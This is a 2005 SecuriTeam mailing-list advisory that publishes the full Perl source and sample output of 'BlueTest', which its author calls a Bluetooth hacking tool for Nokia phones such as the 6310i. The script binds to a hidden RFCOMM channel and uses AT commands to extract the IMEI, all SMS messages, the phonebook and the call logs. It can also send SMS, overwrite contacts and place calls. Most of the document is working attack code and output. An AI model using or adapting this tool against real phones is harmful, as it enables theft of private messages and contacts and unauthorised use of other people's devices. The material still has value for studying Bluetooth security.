[TOOL] BlueTest - Bluetooth Scanner
From: SecuriTeam (support_at_securiteam.com)
To: list@securiteam.com Date: 18 Jul 2005 17:20:26 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site:http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
BlueTest - Bluetooth Scanner
------------------------------------------------------------------------
SUMMARY
DETAILS
Kroma Pierre wrote a tool that can scan
<> Bluetooth devices:
What can it do?
1. Search devices
2. Ping a device (optional)
3. Bind a device (ex. 6310i)
4. Extract device information
5. Extract/manipulate phonebook entries
6. Extract/manipulate SMS entries (Only Nokia 6310i is supported)
7. Extract dialed numbers, missed calls, received calls
8. Make a call (hangup after 20 sec.)
What do you need to run it?
1. Mobile device/phone (example: 6310i)
2. Perl +
Device::Gsm;Getopt::Std;Term::ReadLine;Device::Modem;Term::ANSIColor
3. Bluetooth adapter (example: linksyss usbbt100)
4. Start the script as root (you need root to bind a device at
/dev/rfcomm0)
Tool:
#!/usr/bin/perl
#
# bluetooth hacking tool
#
# written by pierre kroma
# kroma@syss.de
use Device::Gsm;
use Getopt::Std;
use Term::ReadLine;
use Device::Modem;
use Term::ANSIColor;
############## U S A G E ##################
getopts("bcpsv", \%args);
system ("clear");
print "\nBluetooth Pentester\n";
print "written by pierre kroma (kroma\@syss.de)\n\n";
if (!defined $args{s}) {
print qq~
Usage: perl bluetest.pl -s { -b
-b
(example: 00:11:22:33:44:55)
-c
-p = ping the remote device
-s = start the script
-v = be verbose
~; exit;}
################# D E F I N I T I O N ##########
# tools
my $hcitool="/usr/bin/hcitool";
my $l2ping ="/usr/bin/l2ping";
my $rfcomm ="/usr/bin/rfcomm";
my $lsusb = "/usr/sbin/lsusb";
my $hciconfig = "/usr/sbin/hciconfig";
my $bluefw = "/sbin/bluefw";
# variable
my $bluedev="hci0";
my $bt_addr = 0;
my $channel = $args{c};
my $i = 0;
########## S U B R O U T I N E S #################
sub init_adapter
{
use strict;
my $busnum = "";
my $devnum = "";
# busid 0a12:0001 = linksys USBBT100 usb bluetooth stick
my $id = `$lsusb 2>/dev/null |grep 0a12:0001`;
# more generic
# my $id = `$lsusb 2>/dev/null |grep -i bluetooth`;
if ( $id =~ /Bus (\d{3}) Device (\d{3}): ID 0a12:0001/ )
{
$busnum = $1;
$devnum = $2;
system("$bluefw usb $busnum\/$devnum");
system("$hciconfig $bluedev up");
sleep(1.5);
}
}
sub init_modem
{
$modem = new Device::Modem( port => '/dev/rfcomm0' );
if( $modem->connect( baudrate => 9600 ) ) {
# print "connected!\n";
} else {
print "sorry, cannot connect to your serial port!\n";
}
# turn off the local echo
$modem->echo(0);
}
sub searching
{
print color 'bold blue';
print "search devices\n";
print color 'reset';
my @scan = `$hcitool scan | grep -v "Scanning"`;
foreach $line (@scan)
{
print $i++;
print $line;
}
print "\n";
}
sub selecting
{
# select a device
if($args{'b'})
{
$bt_addr = $args{b};
}
else
{
$term = new Term::ReadLine 'bluetooth address reader';
my $prompt = "Enter hw-addr (example: 00:11:22:33:44:55): ";
my $OUT = $term->OUT || \*STDOUT;
$bt_addr = $term->readline($prompt);
}
}
sub ping
{
# ping the remote device
if($args{'p'})
{
# ping the remote device
print color 'bold blue';
print "\nping the remote device $bt_addr\n";
print color 'reset';
die "You must be root to use l2ping!\n" if $> != 0;
system ("$l2ping -c 5 $bt_addr");
}
}
sub binding
{
# binding a device
print color 'bold blue';
print "\n\nbind a device to $bt_addr \t\t";
print color 'reset';
if($args{'c'})
{
$channel = $args{c};
}
else
{
# setting default nokia 6310i hidden channel 17 or 18
$channel = 17;
}
system("$rfcomm release $bluedev 2>/dev/null");
sleep(2);
system("$rfcomm bind $bluedev $bt_addr $channel 2>/dev/null");
sleep(2);
# Connect to the mobile phone
# for devfs
# my $gsm = new Device::Gsm( port => '/dev/bluetooth/rfcomm/0' );
# for udev
$gsm = new Device::Gsm( port => '/dev/rfcomm0' );
if( $gsm->connect() )
{
print color 'bold green';
print "connected!\n";
print color 'reset';
}
else
{
print color 'bold red';
print "sorry, no connection with gsm phone on serial port!\n";
print color 'reset';
exit (1);
}
# Register to GSM network
$gsm->register();
}
sub manu
{
# Extract the manufacturer
my $man_name = $gsm->manufacturer();
print "manufacture: $man_name \n";
}
sub model
{
# model
my $model = $gsm->model();
print "model: $model \n";
}
sub sw
{
# software revision
$modem->atsend( 'AT+CGMR' . Device::Modem::CR );
$rev = $modem->answer();
$rev =~ s/\r//g;
$rev =~ s/OK//g;
print "software revision: \n \n $rev";
sleep(1);
}
sub imei
{
# Extract the IMEI number
my $imei = $gsm->imei();
$imei =~ s/\r//g;
$imei =~ s/OK//g;
print "IMEI: (International Mobile Equipment Identifier) = $imei \n\n";
}
sub readbook
{
print color 'bold blue';
print "\n\nextract the phonebook\n\n";
print color 'reset';
if($args{'v'})
{
print "storagelocation:";
print qq~
ME => storage: device
SM => storage: SIM-card
MT => combination of ME + SM (doesn t work FOR MY 6310i)
BM => storage: CB-news
~;
}
print "\nsupported storage location";
$modem->atsend( 'AT+CPMS=?' . Device::Modem::CR );
$types = $modem->answer();
$types =~ s/\r//g;
$types =~ s/\n//g;
$types =~ s/OK//g;
$types =~ s/\+CPMS//g;
print "$types \n";
print "\ncurrent phonebooksource";
$modem->atsend( 'AT+CPBS?' . Device::Modem::CR );
$source = $modem->answer();
$source =~ s/\r//g;
$source =~ s/\n//g;
$source =~ s/OK//g;
$source =~ s/\+CPBS//g;
print $source;
print "\n\n";
print "\ncurrent used storage on device";
$command="AT+CPBS=\"ME\"";
$modem->atsend( $command . Device::Modem::CR );
$modem->atsend( 'AT+CPBS?' . Device::Modem::CR );
$memory = $modem->answer();
$memory =~ s/\r//g;
$memory =~ s/\n//g;
$memory =~ s/OK//g;
$memory =~ s/\+CPBS//g;
print $memory;
print "\ncurrent used storage on SIM";
$command="AT+CPBS=\"SM\"";
$modem->atsend( $command . Device::Modem::CR );
$modem->atsend( 'AT+CPBS?' . Device::Modem::CR );
$source = $modem->answer();
$source =~ s/\r//g;
$source =~ s/\n//g;
$source =~ s/OK//g;
$source =~ s/\+CPBS//g;
print $source;
print "\n\n";
my $prompt = "What do you want to readout? (ME oder SM) : ";
my $OUT = $term->OUT || \*STDOUT;
$type = $term->readline($prompt);
$command = "AT+CPBS=\"$type\"";
$modem->atsend( $command . Device::Modem::CR );
$asource = $modem->answer();
$asource =~ s/\r//g;
$asource =~ s/\n//g;
$asource =~ s/OK//g;
print $asource;
my $prompt = "starting from entry (>=0): \t ";
my $OUT = $term->OUT || \*STDOUT;
$start = $term->readline($prompt);
print "\n";
my $prompt = "ending to entry:\t\t";
my $OUT = $term->OUT || \*STDOUT;
$max = $term->readline($prompt);
print "\n";
if ( $start > $max || $start <= '0' )
{
print "oops damn f*cking long night? \n";
print "initial value <= 0? \n";
print "or initial value > final value? \n";
exit (1);
}
list_entries ();
print "\nextract last 5 dialled numbers: \n";
$command = "AT+CPBS=\"DC\"";
$modem->atsend( $command . Device::Modem::CR );
$asource = $modem->answer();
$asource =~ s/\r//g;
$asource =~ s/\n//g;
$asource =~ s/OK//g;
print $asource;
$start=1;
$max=5;
list_entries ();
print "\nlast 5 missed calls: \n";
$command = "AT+CPBS=\"MC\"";
$modem->atsend( $command . Device::Modem::CR );
$asource = $modem->answer();
$asource =~ s/\r//g;
$asource =~ s/\n//g;
$asource =~ s/OK//g;
print $asource;
$start=1;
$max=5;
list_entries ();
print "\nlast 5 received calls: \n";
$command = "AT+CPBS=\"RC\"";
$modem->atsend( $command . Device::Modem::CR );
$asource = $modem->answer();
$asource =~ s/\r//g;
$asource =~ s/\n//g;
$asource =~ s/OK//g;
print $asource;
$start=1;
$max=5;
list_entries ();
}
sub list_entries
{
$i = $start;
foreach $i ( $start..$max )
{
$command = "AT+CPBR=$i";
$modem->atsend( $command . Device::Modem::CR );
$entry = $modem->answer();
# format
$entry =~ s/\r//g;
$entry =~ s/\n//g;
$entry =~ s/OK//g;
# parse
# type = 145 = international format = number starts with +
# type = 129 = unknown number format = didn't start with +
( $pos, $num, $type, $tag ) = $entry =~ m/^\+CPBR:
($i),"(.+?)",(\d+),"(.+)?"\r?$/m;
$type =~ s/145/international/g;
$type =~ s/129/unknown/g;
if ( $num == '' )
{
print "entry $i: is empty \n";
}
else
{
print "entry $i: $num, $type, $tag \n";
}
}
}
sub sendsms
{
# Send a text message quickly
print color 'bold blue';
print "\n\nwrite a message (SMS)\n";
print color 'reset';
print "\n";
my $prompt = "recipient (example +4912345678): ";
my $OUT = $term->OUT || \*STDOUT;
$recipient = $term->readline($prompt);
print "\n";
my $prompt = "message: ";
my $OUT = $term->OUT || \*STDOUT;
$message = $term->readline($prompt);
my $status = $gsm->send_sms(
recipient => $recipient,
content => $message
);
if ( $status )
{
print color 'bold green';
print "\nmessage transmitted successfully.\n";
print color 'reset';
}
else
{
print color 'bold red';
print "\nERROR: message couldn`t delivered.\n" ;
print color 'reset';
}
sleep(2);
}
sub readsms
{
# Get list of device::Gsm::Sms message objects
# see `examples/read_messages.pl' for all details
# get mode status
$modem->atsend( 'AT+CMGF?' . Device::Modem::CR );
print color 'bold blue';
print "\nSMS Menu";
print color 'reset';
print "\n \ncurrent sms status (0=PDU, 1=text)";
my $status = $modem->answer();
$status =~ s/\r//g;
$status =~ s/\n//g;
$status =~ s/OK//g;
$status =~ s/\+CMGF//g;
print $status;
sleep(2);
# switch to text mode (does not work with 6310i)
# print "switch to text mode \n";
# $modem->atsend( 'AT+CMGF=1' . Device::Modem::CR );
# print $modem->answer();
print "\n\nextract all sms \n";
$modem->atsend( 'AT+CMGL=4' . Device::Modem::CR );
my $extract = $modem->answer();
$extract =~ s/OK//g;
$extract =~ s/\+CMGL://g;
sleep(2);
print $extract;
}
sub call
{
# read number
print color 'bold blue';
print "\n\nmaking a call\n";
print color 'reset';
print "\n";
my $prompt = "Which number should be called? (example: 004970714078560):
";
my $OUT = $term->OUT || \*STDOUT;
$number = $term->readline($prompt);
print "\ncalling $number \n";
my $max = 20;
if (fork)
{
$modem->dial( $number );
}
else
{
print "waiting $max seconds before ring off: ";
$i = 0;
foreach $i ( 1..$max )
{
print "$i ";
sleep(1);
}
print "\n";
$modem->hangup();
}
}
sub writebook
{
print color 'bold blue';
print "\ncreate a phonebook entry";
print color 'reset';
print "\n";
my $prompt = "storage space number (ATTENTION: you may overwrite an
existing entry:): ";
my $OUT = $term->OUT || \*STDOUT;
$nr = $term->readline($prompt);
print "\n";
my $prompt = "phone-number (format +49123456789): ";
my $OUT = $term->OUT || \*STDOUT;
$tel = $term->readline($prompt);
print "\n";
my $prompt = "name: ";
my $OUT = $term->OUT || \*STDOUT;
$name = $term->readline($prompt);
print "\n";
my $prompt = "storage location (ME=device, SM=SIM): ";
my $OUT = $term->OUT || \*STDOUT;
$place = $term->readline($prompt);
$command="AT+CPBS=\"$place\"";
$modem->atsend( $command . Device::Modem::CR );
$command="AT+CPBW=$nr,\"$tel\",145,\"$name\"";
$modem->atsend( $command . Device::Modem::CR );
$source = $modem->answer();
$source =~ s/\r//g;
$source =~ s/\n//g;
$source =~ s/OK//g;
print $source;
print "\n\nchecking......";
$start = $nr - 5;
$max = 5;
if ( $start <= 0 )
{
$start = $nr;
}
$max = $nr + 5;
print "\n extract your phonebook from storage space number $start to $max
\n";
list_entries ();
print "\n";
}
sub key
{
my $message = "- press any key -";
my $OUT = $term->OUT || \*STDOUT;
$term->readline($message);
}
sub final
{
#system ('cat ./logo.txt');
print color 'bold red';
print "\t\t\t\twritten by pierre kroma (kroma\@syss.de)\n\n";
print color 'reset';
$modem->disconnect();
print "\n";
}
############### M A I N ################
init_adapter ();
searching ();
selecting ();
ping ();
binding ();
init_modem ();
print color 'bold blue';
print "\nextract device information\n";
print color 'reset';
manu ();
model ();
sw ();
imei ();
key();
readsms ();
sendsms ();
key ();
readbook ();
writebook ();
key ();
call ();
key ();
final ();
Example results:
###
# test: #
###
Bluetooth Pentester
written by pierre kroma (kroma@syss.de)
search devices
0 00:60:57:XX:XX:XX Exploit
Enter hw-addr (example: 00:11:22:33:44:55): 00:60:57:XX:XX:XX
bind a device to 00:60:57:XX:XX:XX connected!
extract device information
manufacture: Nokia
model: Nokia 6310i
software revision:
V 5.51
08-07-03
NPL-1
(c) NMP.
IMEI: (International Mobile Equipment Identifier) = XXXXXXXXXXXXXXXX
- press any key -
SMS Menu
current sms status (0=PDU, 1=text): 0
extract all sms
1,1,,159
0791971 ----------- c u t ---------------- ( ;-) )
write a message (SMS)
recipient (example +4912345678): +491727777777
message: SMILE
message transmitted successfully.
extract the phonebook
supported storage location: ("ME","SM"),("ME","SM"),("MT")
current phonebooksource: "SM",16,100
current used storage on device: "ME",9,500
current used storage on SIM: "SM",16,100
What do you want to readout? (ME oder SM) : SM
starting from entry (>=0): 18
ending to entry: 30
entry 18: is empty
entry 19: is empty
entry 20: +49110, international, SySS-Hotline
entry 21: +4917222442, international, D2-Blumengruss
entry 22: +4917222334, international, D2-Events
entry 23: +4911880, international, Telefonauskunft
entry 24: +4917222333, international, D2-Hotelservice
entry 25: 22444, unknown, D2-Wetterinfo
entry 26: 222222, unknown, D2-ADAC Pannenhilf
entry 27: +4917222330, international, D2-Reiseservice
entry 28: 22666, unknown, D2-PassoVoice
entry 29: 22922, unknown, D2-Konto-Server
entry 30: 22933, unknown, D2-HandyBrse
extract last 5 dialled numbers:
entry 1: 012334566, unknown,
entry 2: 0123454566, unknown,
entry 3: 09345739857, unknown,
entry 4: 09287429184, unknown,
entry 5: +49123456789, international,
last 5 missed calls:
entry 1: +49110, international,
entry 2: +4919222, international,
entry 3: +49112, international,
entry 4: is empty
entry 5: is empty
last 5 received calls:
entry 1: is empty
entry 2: +4970714078560, international,
entry 3: +4900001111111, international,
entry 4: +4911111111111, international,
entry 5: +49123456789, international,
create a phonebook entry
storage space number (ATTENTION: you may overwrite an existing entry:): 19
phone-number (format +49123456789): +49666666
name: Callgirl
storage location (ME=device, SM=SIM): SM
checking......
extract your phonebook from storage space number 14 to 24
entry 14: is empty
entry 15: is empty
entry 16: is empty
entry 17: is empty
entry 18: is empty
entry 19: +49666666, international, Callgirl
entry 20: +49110, international, SySS-Hotline
entry 21: +4917222442, international, D2-Blumengruss
entry 22: +4917222334, international, D2-Events
entry 23: +4911880, international, Telefonauskunft
entry 24: +4917222333, international, D2-Hotelservice
making a call
Which number should be called? (example: 004970714078560): 004970714078560
calling 004970714078560
waiting 20 seconds before ring off: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
17 18 19 20
ADDITIONAL INFORMATION
The information has been provided by
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.